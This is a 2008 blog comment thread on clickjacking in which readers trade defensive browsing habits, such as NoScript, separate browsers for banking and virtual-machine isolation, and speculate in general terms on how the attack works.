Comments: Clickjacking -- the new browser wipe-out

Actually, I use elinks every now and then, really ;)

Posted by BigMac at September 29, 2008 10:52 AM

After having been involved in trouble shooting a network integrity problem in the 70s related to automatic scripting ... i've always run with no scripting, no plug-ins, no cookies, no automatic application.

I've found only a few sites that figure they absolutely need it ... so i have two browsers instances with different personalities open at the same time in different workspaces. The 2nd personality has noscript plug-in configured.

This is basically a form of the virtualization theme ... keeping things strongly isolated/partitioned. For the really paranoid there is process that automagically creates a whole virtual machine (from scratch) for browser session ... and then the whole thing is scrubbed/discarded.

This is also related to the theme about virtualization being used eliminating the current traditional desktop operating systems and replacing it with a virtual machine layer with multiple "virtual appliances" ... basically drastically simplified monitors for specific environments (increasing security since it eliminates a lot of the complexity that contributes to vulnerabilities).

this was somewhat the cp67 & cms implementation from the 60s.

--
40+ yrs virtualization experience, online at home since Mar70

Posted by Lynn Wheeler at September 29, 2008 11:05 AM

I have been raring to nominate noScript but I want more usability improvements.

1. I want someway to subscribe to whitelist - so that the admin or someone trusted could whitelist items easily

2. I want noScript to allow trivial JS, like allow JS to resize CSS boxes etc. , disallow ALL that is even a little advanced. I don't know whether this is even possible in JScript .

And in general make it less cryptic for mom and pop.

Posted by anonymous at September 29, 2008 02:47 PM

Whilst "install NoScript" sounds like a great idea short term, what happens when attention is given to NoScript and - like most products given sufficient attention - NoScript is found wanting? We need to bear in mind that people don't take lightly to "do this" and then a month later they're told to stop doing just what they've been told and change once again.

I subscribe to Lynn's view of thinking. I, too, have two different browsers, Firefox and Opera: first for normal browsing, second for banking, purchases, etc.

Posted by Saso at September 30, 2008 12:17 AM

Since the exploit is said not to require Javascript, it may well be based on CSS (say, hiding a malicious link or form under something innocuous and relying on the event cascade to deliver clicks to it). If the exploit truly doesn't need Javascript then NoScript will only protect you to the extent that it inconveniences the bad guy a little.

Posted by Mark Seecof at October 1, 2008 06:41 PM

the mom&pop noscript shouldn't have a 'allow scripts Globally' function. Neither should an (the same?) enterprise version of the software. Looking at the rate of features of the noscript plugin I'm wondering if I'll ever understand what its really doing. I still use it though.

Posted by dan at October 7, 2008 08:16 AM
Post a comment









Remember personal info?






Hit Preview to see your comment.
MT::App::Comments=HASH(0x561549ee0cd8) Subroutine MT::Blog::SUPER::site_url redefined at /home/iang/www/fc/cgi-bin/mt/lib/MT/Object.pm line 125.